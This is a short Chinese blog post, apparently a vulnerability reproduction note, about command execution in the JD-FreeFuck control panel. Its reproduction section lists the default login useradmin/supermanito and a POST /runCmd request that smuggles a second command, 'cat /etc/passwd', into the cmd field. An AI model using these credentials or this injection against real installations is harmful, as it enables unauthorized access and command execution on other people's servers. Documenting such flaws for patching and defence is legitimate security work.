点亮自己的那盏灯

关注

JD-FreeFuck 京东薅羊毛控制面板 后台命令执行漏洞

点亮自己的那盏灯

关注

阅读 33

2022-04-22

漏洞描述

漏洞影响

空间测绘

漏洞复现

  • 访问后登录页面如下

image-20220422224258613

  • ✅ 默认账号useradmin/supermanito
POST /runCmd HTTP/1.1

cmd=bash+jd.sh+%3Bcat /etc/passwd%3B+now&delay=500

image-20220422224428337

个人博客

相关推荐

大师的学徒

控制面板没有mysql

大师的学徒 66 0 0

婉殇成长笔记

godaddy设置方法 控制面板

婉殇成长笔记 89 0 0

树下的老石头

windowsMobile控制面板的调用

树下的老石头 99 0 0

Separes

控制面板及常用设置

Separes 103 0 0

young_d807

win工具/控制面板集合

young_d807 36 0 0

岛上码农

Github上 10 个开源免费且优秀的后台控制面板

岛上码农 70 0 0

求索大伟

VPS 控制面板简介与选择指南

求索大伟 26 0 0

非常帅气的昵称吧

【微服务~Sentinel】Sentinel之dashboard控制面板

非常帅气的昵称吧 104 0 0

秦瑟读书

MT主机控制面板Plesk 使用指南

秦瑟读书 72 0 0

老榆

通过控制面板开启子系统功能

老榆 22 0 0

精彩评论(0)

0 0 举报